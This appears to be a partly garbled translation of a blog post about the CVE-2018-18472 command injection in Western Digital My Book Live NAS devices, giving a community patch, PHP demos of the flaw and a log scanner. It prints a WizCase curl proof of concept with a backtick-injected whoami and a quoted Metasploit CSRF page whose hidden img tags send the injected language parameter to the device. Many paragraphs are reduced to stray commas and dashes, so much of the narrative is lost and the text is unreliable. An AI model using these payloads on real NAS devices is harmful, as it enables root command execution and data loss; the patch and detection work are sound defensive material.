A reputation fix or a custom fix for CVE-2018-18472 in WD NAS devices?

For the widely discussed story of Western Digital NAS drives being wiped, see @ZlodeiBaal's post: Western Digital erased most users' NAS data





This post is also about a fix for the vulnerability which, as it turns out, is 7 years old (it dates from 2014), even though Western Digital brushed it off 3 days ago with the following paragraph:










The My Book Live series was introduced to the market in 2010 and these devices received their final firmware update in 2015. [1]





17 hours ago, user dracenmarx posted the following instructions for fixing the Remote Code Execution (RCE) bug:





  • Log in via SSH and edit the file (for example, with nano):





  • /var/www/Admin/webapp/includes/languageConfiguration.php





  • First change. Find:





exec("sudo bash -c '(echo \"language {$changes["language"]}\">/etc/language.conf)'", $output, $retVal);



  • Replace with:





if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $changes["language"], $dummy)) return 'BAD_REQUEST';
exec("sudo bash -c '(echo '\"'\"".escapeshellarg("language {$changes["language"]}")."\"'\"'>/etc/language.conf)'", $output, $retVal);



  • Second change. Find:





exec("sudo bash -c '(echo \"language {$lang["language"]}\">/etc/language.conf)'", $output, $retVal);



  • Replace with:





if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $lang["language"], $dummy)) return 'BAD_REQUEST';
exec("sudo bash -c '(echo '\"'\"".escapeshellarg("language {$lang["language"]}")."\"'\"'>/etc/language.conf)'", $output, $retVal);



According to him, he did not find any other similar bugs.
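To see what those two replaced lines actually change, here is an added example (my own code, not part of the My Book Live firmware and not from dracenmarx's post). It builds both command strings the way languageConfiguration.php does, for both call sites, which have the same shape, and runs them without sudo against a temp file instead of /etc/language.conf. The function names, the temp-file target and the payload are assumptions for the demo; the whitelist regex and the escapeshellarg() quoting are taken from the fix. It needs PHP 7.1+ and a bash on the path.

```php
<?php
// Added example for this post, not code from the My Book Live firmware or from
// dracenmarx's instructions. Function names are hypothetical; $target replaces
// /etc/language.conf so the demo can run unprivileged against a temp file.

// Shape of the two exec() calls in languageConfiguration.php: the user value is
// interpolated into a double-quoted bash string, so backticks, $(...) and a
// stray double quote are all interpreted by the bash that sudo starts.
function build_vulnerable_cmd(string $lang, string $target): string
{
    return "sudo bash -c '(echo \"language {$lang}\">{$target})'";
}

// The fix from the post: whitelist first (xx_XX only), then escapeshellarg()
// so the value reaches echo as one literal word even if the whitelist were
// ever loosened. Returns null where the original returns 'BAD_REQUEST'.
function build_fixed_cmd(string $lang, string $target): ?string
{
    if (!preg_match('/^[a-z]{2}_[A-Z]{2}$/', $lang)) {
        return null;
    }
    return "sudo bash -c '(echo '\"'\"" . escapeshellarg("language {$lang}") . "\"'\"'>{$target})'";
}

// Run a built command with the sudo prefix dropped and return what landed
// in the target file.
function run_without_sudo(string $cmd, string $target): string
{
    exec(preg_replace('/^sudo /', '', $cmd), $out, $rc);
    return trim((string) file_get_contents($target));
}

function demo(): array
{
    $target = tempnam(sys_get_temp_dir(), 'lang');
    // Constructed payload in the style of the WizCase PoC (a command in backticks).
    $payload = 'en_US`id -u`';

    $results = [];
    $results['vulnerable, payload'] = run_without_sudo(build_vulnerable_cmd($payload, $target), $target);
    $results['fixed, payload']      = build_fixed_cmd($payload, $target) ?? 'BAD_REQUEST';
    $results['fixed, en_US']        = run_without_sudo(build_fixed_cmd('en_US', $target), $target);
    unlink($target);
    return $results;
}

print_r(demo());
```

The vulnerable path writes the output of id -u into the file, which is the attacker's backticks being executed by bash; on a real device that bash runs under sudo, so the substituted command runs as root. The fixed path rejects the payload before any shell is spawned, and the escapeshellarg() wrapping is a second layer for the case where the whitelist is ever widened. The regex is the part that matters: if some locale ever needs another value, extend the pattern rather than remove the check.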





, , , , sudo c sudoers. , ​, - ! , exec , STDOUT.





, dracenmarx , 2018- , ? https://cve.circl.lu/cve/CVE-2018-18472 ( - WizCase)





Western Digital WD My Book Live ( ) language /api/1.0/rest/language_configuration. , .





, , — . ? — . WizCase PoC:





curl -kX GET -d 'bim=param`whoami`' https:///panel/rest/configuration



WD 2018-, , , . , , , . - dracenmarx, 26 .





, dracenmarx:





CVE-2018-18472, , 2014-! (WDMyCloud Command Injection CSRF) , MyBookLive WD ?! - dracenmarx, 26





. 20- 2014. Metasploit. :





Name: WDMyCloud NAS Command Injection CSRF





Description: This module exploits a command injection vulnerability in the web interface of the WDMyCloud NAS device, via CSRF. It will submit the CSRF request to RHOST, as well as wdmycloud and wdmycloud.local.





DisclosureDate: 0 day, yo





3 , , NAS, .





params = "format=xml&rest_method=PUT&language=" + Rex::Text.uri_encode("`#{payload.encoded}`")
...
<html>
<body>
<h1>Redirecting... Please Wait</h1>
<div style='display:none'>
<img src='http://wdmycloud.local/api/1.0/rest/language_configuration?#{params}' />
<img src='http://wdmycloud/api/1.0/rest/language_configuration?#{params}' />
<img src='http://#{datastore['RHOST']}/api/1.0/rest/language_configuration?#{params}' />
</div>
      
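The WizCase PoC and the Metasploit CSRF page above show what the attack looks like on the wire: a request to /api/1.0/rest/language_configuration whose language parameter carries shell syntax, optionally with rest_method=PUT smuggled through a GET so that an img tag can send it cross-site. The following is an added example (not from WizCase, the Metasploit module or the firmware) that scans Apache combined-format access log lines for those two shapes. The log lines are constructed for the demo, the function names are mine, and the whitelist regex is the one from dracenmarx's fix.

```php
<?php
// Added example for this post, not from WizCase, the Metasploit module or the
// firmware. Scans Apache combined-format access log lines for the two request
// shapes shown above. Sample lines at the bottom are constructed for the demo.

const LANG_ENDPOINT  = '/api/1.0/rest/language_configuration';
const LANG_WHITELIST = '/^[a-z]{2}_[A-Z]{2}$/';   // same regex as the fix

// Split one combined-format line into the fields we need. Returns null for
// lines that do not parse; a real pipeline would count those separately.
function parse_log_line(string $line): ?array
{
    $re = '/^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
        . '"(?P<method>[A-Z]+) (?P<path>[^ ?"]+)(?:\?(?P<query>[^ "]*))? HTTP\/[\d.]+" '
        . '\d+ \S+ "(?P<referer>[^"]*)" "[^"]*"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $params = [];
    parse_str($m['query'] ?? '', $params);   // percent-decodes the values for us
    return [
        'ip'      => $m['ip'],
        'method'  => $m['method'],
        'path'    => $m['path'],
        'params'  => $params,
        'referer' => $m['referer'],
    ];
}

// One finding per suspicious request to the language endpoint.
function scan_access_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        $req = parse_log_line($line);
        if ($req === null || $req['path'] !== LANG_ENDPOINT) {
            continue;
        }
        $reasons = [];
        // Anything outside xx_XX is an injection attempt whatever the quoting
        // trick, so there is no need to enumerate backticks, $( or quotes.
        if (isset($req['params']['language'])
            && !preg_match(LANG_WHITELIST, (string) $req['params']['language'])) {
            $reasons[] = 'language outside xx_XX whitelist: ' . json_encode($req['params']['language']);
        }
        // The Metasploit module tunnels a PUT through a GET so an img tag can
        // fire it cross-site; rest_method on a GET is that fingerprint.
        if ($req['method'] === 'GET' && isset($req['params']['rest_method'])) {
            $reasons[] = 'rest_method override on GET (CSRF-able form), referer ' . $req['referer'];
        }
        if ($reasons) {
            $findings[] = ['ip' => $req['ip'], 'reasons' => $reasons];
        }
    }
    return $findings;
}

// Constructed sample traffic: one CSRF-style hit, one benign change, one
// direct injection via curl, one unrelated request.
$sample = [
    '192.168.1.50 - - [23/Jun/2021:21:14:02 +0300] "GET /api/1.0/rest/language_configuration?format=xml&rest_method=PUT&language=%60id%60 HTTP/1.1" 200 312 "http://attacker.example/" "Mozilla/5.0"',
    '192.168.1.23 - - [23/Jun/2021:21:15:10 +0300] "GET /api/1.0/rest/language_configuration?language=en_US HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [23/Jun/2021:21:16:44 +0300] "GET /api/1.0/rest/language_configuration?language=de_DE%22%3Bwhoami%3B%23 HTTP/1.1" 200 312 "-" "curl/7.68.0"',
    '10.0.0.7 - - [23/Jun/2021:21:17:01 +0300] "GET /UI/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];
print_r(scan_access_log($sample));
```

The first and third sample lines are reported, the benign en_US change and the unrelated request are not. Only the query string reaches the access log: a body sent with curl -d, as in the WizCase PoC, never appears there, so this catches the CSRF and URL-borne variants but not every form of the attack. On a device that cannot be patched, the realistic controls remain the ones WD itself names in its statement: keep the device from being reachable from the Internet and restrict which local hosts can reach its web interface.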


, . language ! 2014.





, . 11 2014- 29- 2015-. , ... PR :)





, "", (→ https://gist.github.com/phikshun) 7 , , WD - 2018-. - ( , ), — , :





The vulnerability report CVE-2018-18472 affects My Book Live devices originally introduced to the market between 2010 and 2012. These products have been discontinued since 2014 and are no longer covered under our device software support lifecycle. We encourage users who wish to continue operating these legacy products to configure their firewall to prevent remote access to these devices, and to take measures to ensure that only trusted devices on the local network have access to the device.





Western Digital takes the security of our customers’ data seriously, and we provide security updates for our products to address issues from both external reports and regular security audits. Additionally, we welcome the opportunity to work with members of the security research community through responsible disclosure to help protect our users. [...]





- WizCase





— B2B, . MBA, IT.





, , — , .





— .





, TestDisk/PhotoRec . — dd, — openssl . , :





I got a quote for data recovery and it was $2,000 to $5,000. Unbelievable. - mkennedy





Another affected user here in Canada. I had no idea there was an issue until I read the email from WD this afternoon. I checked the drive and sure enough, only the default folders were there. I unplugged the drive and here we are. I’m a hobby photographer, approximately 80,000 photos gone. I’m on the support chat waitlist, it’s been 11 seconds remaining for the past 20 minutes so I’m not holding my breath. - damack604







